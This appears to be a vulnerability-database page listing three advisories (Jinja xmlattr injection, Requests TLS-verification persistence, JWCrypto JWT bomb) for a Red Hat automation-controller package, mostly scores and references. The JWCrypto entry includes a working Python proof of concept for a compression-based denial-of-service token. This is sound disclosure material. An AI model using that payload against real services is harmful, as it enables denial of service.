Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:rpm/redhat/automation-controller@4.5.8-1?arch=el9ap
Typerpm
Namespaceredhat
Nameautomation-controller
Version4.5.8-1
Qualifiers
arch el9ap
Subpath
Is_vulnerabletrue
Next_non_vulnerable_versionnull
Latest_non_vulnerable_versionnull
Affected_by_vulnerabilities
0
url VCID-at54-9w17-wbe8
vulnerability_id VCID-at54-9w17-wbe8
summary 
Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter
The `xmlattr` filter in affected versions of Jinja accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, `/`, `>`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for the previous GHSA-h5c8-rqwp-cp95 CVE-2024-22195 only addressed spaces but not other characters.

Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting _values_ as user input continues to be safe.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-34064.json
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-34064.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-34064
reference_id
reference_type
scores
0
value 0.00838
scoring_system epss
scoring_elements 0.74721
published_at 2026-04-21T12:55:00Z
1
value 0.00838
scoring_system epss
scoring_elements 0.7473
published_at 2026-04-18T12:55:00Z
2
value 0.00838
scoring_system epss
scoring_elements 0.74691
published_at 2026-04-09T12:55:00Z
3
value 0.00838
scoring_system epss
scoring_elements 0.74677
published_at 2026-04-08T12:55:00Z
4
value 0.00838
scoring_system epss
scoring_elements 0.74644
published_at 2026-04-02T12:55:00Z
5
value 0.00838
scoring_system epss
scoring_elements 0.74723
published_at 2026-04-16T12:55:00Z
6
value 0.00838
scoring_system epss
scoring_elements 0.74686
published_at 2026-04-13T12:55:00Z
7
value 0.00838
scoring_system epss
scoring_elements 0.7467
published_at 2026-04-04T12:55:00Z
8
value 0.00838
scoring_system epss
scoring_elements 0.74645
published_at 2026-04-07T12:55:00Z
9
value 0.00838
scoring_system epss
scoring_elements 0.74694
published_at 2026-04-12T12:55:00Z
10
value 0.00838
scoring_system epss
scoring_elements 0.74714
published_at 2026-04-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-34064
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34064
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34064
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/pallets/jinja
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/pallets/jinja
5
reference_url https://github.com/pallets/jinja/commit/0668239dc6b44ef38e7a6c9f91f312fd4ca581cb
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-09T17:53:36Z/
url https://github.com/pallets/jinja/commit/0668239dc6b44ef38e7a6c9f91f312fd4ca581cb
6
reference_url https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-09T17:53:36Z/
url https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj
7
reference_url https://lists.debian.org/debian-lts-announce/2024/12/msg00009.html
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2024/12/msg00009.html
8
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC
9
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE
10
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS
11
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS
12
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-34064
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-34064
13
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1070712
reference_id 1070712
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1070712
14
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2279476
reference_id 2279476
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2279476
15
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC/
reference_id 567XIGSZMABG6TSMYWD7MIYNJSUQQRUC
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-09T17:53:36Z/
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC/
16
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE/
reference_id GCLF44KY43BSVMTE6S53B4V5WP3FRRSE
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-09T17:53:36Z/
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE/
17
reference_url https://github.com/advisories/GHSA-h75v-3vvj-5mfj
reference_id GHSA-h75v-3vvj-5mfj
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-h75v-3vvj-5mfj
18
reference_url https://access.redhat.com/errata/RHSA-2024:3781
reference_id RHSA-2024:3781
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3781
19
reference_url https://access.redhat.com/errata/RHSA-2024:3795
reference_id RHSA-2024:3795
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3795
20
reference_url https://access.redhat.com/errata/RHSA-2024:3811
reference_id RHSA-2024:3811
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3811
21
reference_url https://access.redhat.com/errata/RHSA-2024:3820
reference_id RHSA-2024:3820
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3820
22
reference_url https://access.redhat.com/errata/RHSA-2024:4231
reference_id RHSA-2024:4231
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:4231
23
reference_url https://access.redhat.com/errata/RHSA-2024:4404
reference_id RHSA-2024:4404
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:4404
24
reference_url https://access.redhat.com/errata/RHSA-2024:4414
reference_id RHSA-2024:4414
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:4414
25
reference_url https://access.redhat.com/errata/RHSA-2024:4427
reference_id RHSA-2024:4427
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:4427
26
reference_url https://access.redhat.com/errata/RHSA-2024:4522
reference_id RHSA-2024:4522
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:4522
27
reference_url https://access.redhat.com/errata/RHSA-2024:4616
reference_id RHSA-2024:4616
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:4616
28
reference_url https://access.redhat.com/errata/RHSA-2024:4958
reference_id RHSA-2024:4958
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:4958
29
reference_url https://access.redhat.com/errata/RHSA-2024:5662
reference_id RHSA-2024:5662
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:5662
30
reference_url https://access.redhat.com/errata/RHSA-2024:5810
reference_id RHSA-2024:5810
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:5810
31
reference_url https://access.redhat.com/errata/RHSA-2024:6011
reference_id RHSA-2024:6011
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:6011
32
reference_url https://access.redhat.com/errata/RHSA-2024:9150
reference_id RHSA-2024:9150
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:9150
33
reference_url https://access.redhat.com/errata/RHSA-2025:1335
reference_id RHSA-2025:1335
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:1335
34
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS/
reference_id SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-09T17:53:36Z/
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS/
35
reference_url https://usn.ubuntu.com/6787-1/
reference_id USN-6787-1
reference_type
scores
url https://usn.ubuntu.com/6787-1/
36
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS/
reference_id ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-09T17:53:36Z/
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS/
fixed_packages
aliases CVE-2024-34064, GHSA-h75v-3vvj-5mfj
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-at54-9w17-wbe8
1
url VCID-duvn-u125-dqan
vulnerability_id VCID-duvn-u125-dqan
summary 
Requests `Session` object does not verify requests after making first request with verify=False
When using a `requests.Session`, if the first request to a given origin is made with `verify=False`, TLS certificate verification may remain disabled for all subsequent requests to that origin, even if `verify=True` is explicitly specified later.

This occurs because the underlying connection is reused from the session's connection pool, causing the initial TLS verification setting to persist for the lifetime of the pooled connection. As a result, applications may unintentionally send requests without certificate verification, leading to potential man-in-the-middle attacks and compromised confidentiality or integrity.

This behavior affects versions of `requests` prior to 2.32.0.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-35195.json
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-35195.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-35195
reference_id
reference_type
scores
0
value 0.00044
scoring_system epss
scoring_elements 0.13552
published_at 2026-04-21T12:55:00Z
1
value 0.00044
scoring_system epss
scoring_elements 0.13481
published_at 2026-04-18T12:55:00Z
2
value 0.00044
scoring_system epss
scoring_elements 0.13485
published_at 2026-04-16T12:55:00Z
3
value 0.00044
scoring_system epss
scoring_elements 0.13691
published_at 2026-04-02T12:55:00Z
4
value 0.00044
scoring_system epss
scoring_elements 0.1357
published_at 2026-04-13T12:55:00Z
5
value 0.00044
scoring_system epss
scoring_elements 0.13618
published_at 2026-04-12T12:55:00Z
6
value 0.00044
scoring_system epss
scoring_elements 0.13654
published_at 2026-04-11T12:55:00Z
7
value 0.00044
scoring_system epss
scoring_elements 0.13685
published_at 2026-04-09T12:55:00Z
8
value 0.00044
scoring_system epss
scoring_elements 0.13633
published_at 2026-04-08T12:55:00Z
9
value 0.00044
scoring_system epss
scoring_elements 0.13553
published_at 2026-04-07T12:55:00Z
10
value 0.00044
scoring_system epss
scoring_elements 0.13752
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-35195
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-35195
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-35195
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/psf/requests
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/psf/requests
5
reference_url https://github.com/psf/requests/commit/a58d7f2ffb4d00b46dca2d70a3932a0b37e22fac
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-21T14:17:58Z/
url https://github.com/psf/requests/commit/a58d7f2ffb4d00b46dca2d70a3932a0b37e22fac
6
reference_url https://github.com/psf/requests/pull/6655
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-21T14:17:58Z/
url https://github.com/psf/requests/pull/6655
7
reference_url https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-21T14:17:58Z/
url https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56
8
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q
9
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-35195
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-35195
11
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1071593
reference_id 1071593
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1071593
12
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2282114
reference_id 2282114
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2282114
13
reference_url https://github.com/advisories/GHSA-9wx4-h78v-vm56
reference_id GHSA-9wx4-h78v-vm56
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-9wx4-h78v-vm56
14
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q/
reference_id IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-21T14:17:58Z/
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q/
15
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ/
reference_id N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-21T14:17:58Z/
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ/
16
reference_url https://access.redhat.com/errata/RHSA-2024:3781
reference_id RHSA-2024:3781
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3781
17
reference_url https://access.redhat.com/errata/RHSA-2024:4522
reference_id RHSA-2024:4522
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:4522
18
reference_url https://access.redhat.com/errata/RHSA-2024:9988
reference_id RHSA-2024:9988
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:9988
19
reference_url https://access.redhat.com/errata/RHSA-2025:0012
reference_id RHSA-2025:0012
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:0012
20
reference_url https://access.redhat.com/errata/RHSA-2025:1335
reference_id RHSA-2025:1335
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:1335
21
reference_url https://access.redhat.com/errata/RHSA-2025:2399
reference_id RHSA-2025:2399
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:2399
22
reference_url https://access.redhat.com/errata/RHSA-2025:7049
reference_id RHSA-2025:7049
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:7049
23
reference_url https://access.redhat.com/errata/RHSA-2025:8385
reference_id RHSA-2025:8385
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:8385
fixed_packages
aliases CVE-2024-35195, GHSA-9wx4-h78v-vm56
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-duvn-u125-dqan
2
url VCID-ygj7-qwt8-sud5
vulnerability_id VCID-ygj7-qwt8-sud5
summary 
JWCrypto vulnerable to JWT bomb Attack in `deserialize` function
## Affected version
Vendor: https://github.com/latchset/jwcrypto
Version: 1.5.5

## Description
An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio.
When the server processes this Token, it will consume a lot of memory and processing time.

## Poc
```python
from jwcrypto import jwk, jwe
from jwcrypto.common import json_encode, json_decode
import time
public_key = jwk.JWK()
private_key = jwk.JWK.generate(kty='RSA', size=2048)
public_key.import_key(**json_decode(private_key.export_public()))


payload = '{"u": "' + "u" * 400000000 + '", "uu":"' + "u" * 400000000 + '"}'
protected_header = {
    "alg": "RSA-OAEP-256",
    "enc": "A256CBC-HS512",
    "typ": "JWE",
    "zip": "DEF",
    "kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(compact=True)

print("-----uncompress-----")

print(len(enc))

begin = time.time()

jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)

print(time.time() - begin)

print("-----compress-----")

payload = '{"u": "' + "u" * 400000 + '", "uu":"' + "u" * 400000 + '"}'
protected_header = {
    "alg": "RSA-OAEP-256",
    "enc": "A256CBC-HS512",
    "typ": "JWE",
    "kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(compact=True)

print(len(enc))

begin = time.time()

jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)

print(time.time() - begin)
```
It can be found that when processing Tokens with similar lengths, the processing time of compressed tokens is significantly longer.
<img width="172" alt="image" src="https://github.com/latchset/jwcrypto/assets/133195620/23193327-3cd7-499a-b5aa-28c56af92785">



## Mitigation
To mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also
been adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing
attackers from exploiting this vulnerability with high compression ratio tokens.

## References
[1] [CVE-2024-21319](https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/security/advisories/GHSA-8g9c-28fc-mcx2)
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-28102.json
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-28102.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-28102
reference_id
reference_type
scores
0
value 0.0036
scoring_system epss
scoring_elements 0.5822
published_at 2026-04-21T12:55:00Z
1
value 0.00381
scoring_system epss
scoring_elements 0.59567
published_at 2026-04-11T12:55:00Z
2
value 0.00381
scoring_system epss
scoring_elements 0.59485
published_at 2026-04-07T12:55:00Z
3
value 0.00381
scoring_system epss
scoring_elements 0.59518
published_at 2026-04-04T12:55:00Z
4
value 0.00381
scoring_system epss
scoring_elements 0.59493
published_at 2026-04-02T12:55:00Z
5
value 0.00381
scoring_system epss
scoring_elements 0.59532
published_at 2026-04-13T12:55:00Z
6
value 0.00381
scoring_system epss
scoring_elements 0.59552
published_at 2026-04-12T12:55:00Z
7
value 0.00381
scoring_system epss
scoring_elements 0.59548
published_at 2026-04-09T12:55:00Z
8
value 0.00381
scoring_system epss
scoring_elements 0.59536
published_at 2026-04-08T12:55:00Z
9
value 0.00392
scoring_system epss
scoring_elements 0.60219
published_at 2026-04-16T12:55:00Z
10
value 0.00392
scoring_system epss
scoring_elements 0.60226
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-28102
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28102
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28102
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/latchset/jwcrypto
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/latchset/jwcrypto
5
reference_url https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-02T19:56:39Z/
url https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f
6
reference_url https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-02T19:56:39Z/
url https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97
7
reference_url https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-28102
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-28102
9
reference_url https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103
10
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1065688
reference_id 1065688
reference_type
scores
